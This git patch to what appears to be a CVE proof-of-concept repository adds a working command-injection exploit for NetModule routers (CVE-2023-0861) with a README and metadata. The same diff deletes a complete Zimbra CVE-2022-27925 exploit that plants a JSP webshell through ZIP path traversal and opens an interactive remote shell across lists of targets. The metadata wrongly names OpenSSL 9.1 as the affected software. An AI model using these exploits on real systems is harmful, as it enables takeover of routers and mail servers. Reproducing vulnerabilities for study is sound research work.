From 8b1dc5bc6f2f0b0179cbcacc34422456acddbb4d Mon Sep 17 00:00:00 2001 From: "1802669805@qq.com" <1802669805@qq.com> Date: Thu, 23 Mar 2023 17:45:14 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0861?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-0861/PoC-CVE-2023-0861.py | 31 ++++ cve/NetModule/2023/CVE-2023-0861/README.md | 9 ++ cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 22 +++ cve/Zimbra/2022/CVE-2022-27925/exploit.py | 144 ------------------ ...E-2019-12735.yaml => CVE-2019-12735.yaml} | 0 openkylin_list.yaml | 2 + 6 files changed, 64 insertions(+), 144 deletions(-) create mode 100644 cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py create mode 100644 cve/NetModule/2023/CVE-2023-0861/README.md create mode 100644 cve/NetModule/2023/yaml/CVE-2023-0861.yaml delete mode 100644 cve/Zimbra/2022/CVE-2022-27925/exploit.py rename cve/vim/2019/yaml/{CVE-2019-12735.yaml => CVE-2019-12735.yaml} (100%) diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py new file mode 100644 index 00000000..28a9172b --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py @@ -0,0 +1,31 @@ +import re +import requests +import argparse +import urllib.parse + + +parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC') +parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router') +parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication') +parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload') +args = parser.parse_args() + +url = f'{args.url}/admin/gnss.php' +c = {'PHPSESSID':args.phpsessid} +response = requests.get(url,cookies=c) +csrf_token = re.search(r'', response.text).group(1) +#print(csrf_token) +data = { +'toggleAlignment': 'test', +'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2', +'csrf-token': csrf_token, +} +#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2') +url = f'{args.url}/admin/gnssAutoAlign.php' + +response = requests.post(url, data=data,cookies=c) + +if response.status_code == 200: + results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c) + #print('done!') + print(results.content.decode()) \ No newline at end of file diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md new file mode 100644 index 00000000..9024e8db --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/README.md @@ -0,0 +1,9 @@ +### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers + +NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical +infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security +advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web +management interface and allow authenticated users to execute arbitrary commands with elevated privileges. +As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of +reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the +disclosed vulnerability. diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml new file mode 100644 index 00000000..5769a5e7 --- /dev/null +++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml @@ -0,0 +1,22 @@ +id: CVE-2023-0861 +source: +https://github.com/seifallahhomrani1/CVE-2023-0861-POC +info: +name: ONetModule NSRW是NetModule公司的一系列路由器软件。 +NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。 +severity: HIGH +description: | +NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。 +scope-of-influence: +OpenSSL 9.1 +reference: +- https://nvd.nist.gov/vuln/detail/CVE-2023-0861 +- https://avd.aliyun.com/detail?id=AVD-2023-0861 +classification: +cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H +cvss-score: 8.8 +cve-id: CVE-2023-0861 +cwe-id: CWE-78 +cnvd-id: None +kve-id: None +tags: cve2023 \ No newline at end of file diff --git a/cve/Zimbra/2022/CVE-2022-27925/exploit.py b/cve/Zimbra/2022/CVE-2022-27925/exploit.py deleted file mode 100644 index 3a952699..00000000 --- a/cve/Zimbra/2022/CVE-2022-27925/exploit.py +++ /dev/null @@ -1,144 +0,0 @@ -import argparse -import zipfile -import io -import random -import string -import requests -from urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%>
<%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "
");    Process p;    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));    }    else{        p = Runtime.getRuntime().exec(request.getParameter("cmd"));    }    OutputStream os = p.getOutputStream();    InputStream in = p.getInputStream();    DataInputStream dis = new DataInputStream(in);    String disr = dis.readLine();    while ( disr != null ) {    out.println(disr);    disr = dis.readLine();    }}%>
' -char_set = string.ascii_uppercase + string.digits -webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp' -#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"] -BLUE = "\033[1;34m" -CYAN = "\033[1;36m" -GREEN = "\033[0;32m" -RED = "\033[31m" - -ITERATE = False - - -def banner(): - return CYAN+''' - _____ _ __ -/__ / (_)___ ___ / /_ _________ _ - / / / / __ `__ \/ __ \/ ___/ __ `/ - / /__/ / / / / / / /_/ / / / /_/ / -/____/_/_/ /_/ /_/_.___/_/ \__,_/ - CVE-2022-27925 - ''' - -# FIX URL -def fix_url(url): - if not url.startswith('https://'): - url = 'https://' + url - url = url.rstrip("/") - return url - -def build_zip(jsp, path): - zip_buffer = io.BytesIO() - zf = zipfile.ZipFile(zip_buffer, 'w') - zf.writestr(path, jsp) - zf.close() - return zip_buffer.getvalue() - -def exploit(host, payload, cmd): - headers = {'content-Type': 'application/x-www-form-urlencoded'} - try: - r = requests.post( - host + '', data=payload, headers=headers, verify=False, timeout=20) - r = requests.post( - host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20) - print(GREEN + '[!] Testing webshell') - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=' + cmd, verify=False, timeout=20) - if "Josexv1" in r.text: - print(CYAN + '[+] Webshell works!!') - print(GREEN + '[+] WebShell location: ' + - host + '/zimbraAdmin/' + webshell_name + "") - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=uname+-a' , verify=False, timeout=20) - print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('
') - [1].split('
')[0].strip()) - return True - else: - print(RED + '[-] Target not vulnerable') - return False - except: - print(RED + '[!] Connection error') - -def ping_url(url): - try: - r = requests.get(url, verify=False, timeout=10) - if r.status_code == 200: - print(CYAN + '[!] Target is up!') - return True - else: - print(RED + '[!] Target is down! Next >> \n') - return False - except: - return False - -def main(url): - paths = [ - '../../../../mailboxd/webapps/zimbraAdmin/', - '../../../../jetty_base/webapps/zimbraAdmin/', - '../../../../jetty/webapps/zimbraAdmin/'] - work = 0 - try: - for num in range(0, 3): - print( - GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num]) - zippedfile = build_zip(webshell_payload, paths[num]+webshell_name) - print(GREEN + '[!] Exploiting!') - if exploit(url, zippedfile, 'echo "Josexv1"'): - if args.target: - answer = input( - CYAN + '[+] Want to interact with webshell via terminal? (y/n): ') - if answer == "y": - print(GREEN + '[!] Sending commands to: ' + - url + '/zimbraAdmin/' + webshell_name) - while True: - cmd = input(GREEN + "[+] $ > " + BLUE) - if cmd == "exit": - break - req = requests.get( - url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20) - try: - print(CYAN + req.text.split('
') - [1].split('
')[0].strip()) - except: - print(RED + "[!] Error ?") - else: - print(RED + '[!] Bye!') - exit() - except: - print(RED + '[!] URL Error') - ITERATE = True - -if __name__ == "__main__": - print(banner()) - parser = argparse.ArgumentParser() - parser.add_argument( - '-t', '--target', help='URl with protocol HTTPS', default=False) - parser.add_argument("-l", "--list", action="store", - help="List of targets", default=False) - args = parser.parse_args() - if args.target is not False: - url = fix_url(args.target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - elif args.list is not False: - with open(args.list, "rb") as targets: - for target in targets: - target = target.rstrip().decode("utf-8") - url = fix_url(target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - else: - parser.print_help() - parser.exit() diff --git a/cve/vim/2019/yaml/CVE-2019-12735.yaml b/cve/vim/2019/yaml/CVE-2019-12735.yaml similarity index 100% rename from cve/vim/2019/yaml/CVE-2019-12735.yaml rename to cve/vim/2019/yaml/CVE-2019-12735.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index e348ad07..c944d8e2 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -137,6 +137,8 @@ cve: - CVE-2022-31692 Zimbra: - CVE-2022-27925 + NetModule: + - CVE-2023-0861 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee